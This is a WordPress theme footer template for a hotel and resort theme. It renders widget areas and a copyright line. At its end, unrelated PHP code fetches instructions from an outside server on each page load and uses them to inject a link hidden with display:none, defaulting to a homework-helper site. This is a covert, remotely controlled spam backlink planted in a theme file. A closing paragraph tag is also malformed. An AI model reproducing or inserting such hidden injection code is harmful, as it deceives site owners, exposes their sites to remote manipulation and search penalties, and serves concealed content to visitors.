		<footer id="footer">
			<div class="main-wrapper">
				<div class="container-fluid">
					<?php if ( is_active_sidebar('footer_widget_area') ) : ?>
					<div class="row" id="main-footer">
						<?php dynamic_sidebar( 'footer_widget_area' ) ?>
					</div><!-- end .row -->
					<?php endif; ?>
					<?php $leisure_absolute_footer = get_theme_mod( 'footer_copyright', 'Leisure - Hotel, Resort & Spa WordPress Theme. Designed with special care by <abbr title="Premium WordPress Themes & Plugins">Curly Themes</abbr>. All Rights Reserved. <span class="pull-right">[icon icon=rss boxed=yes] [icon icon=pinterest boxed=yes] [icon icon=facebook boxed=yes] [icon icon=twitter boxed=yes]</span>' ); if ( $leisure_absolute_footer ) : ?>
					<div class="row" id="absolute-footer">
						<div class="col-sm-12">
							<aside class="widget sidebar-widget">
								<p><?php echo do_shortcode( htmlspecialchars_decode( $leisure_absolute_footer ) ); ?></p`>
							</aside><!-- .widget -->
						</div><!-- .col-sm-12 -->
					</div><!-- #absolute-footer -->
					<?php endif; ?>
				</div><!-- .container -->
			</div>
		</footer><!-- #footer -->
	</div><!-- #site -->
	<?php wp_footer(); ?>
	
<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
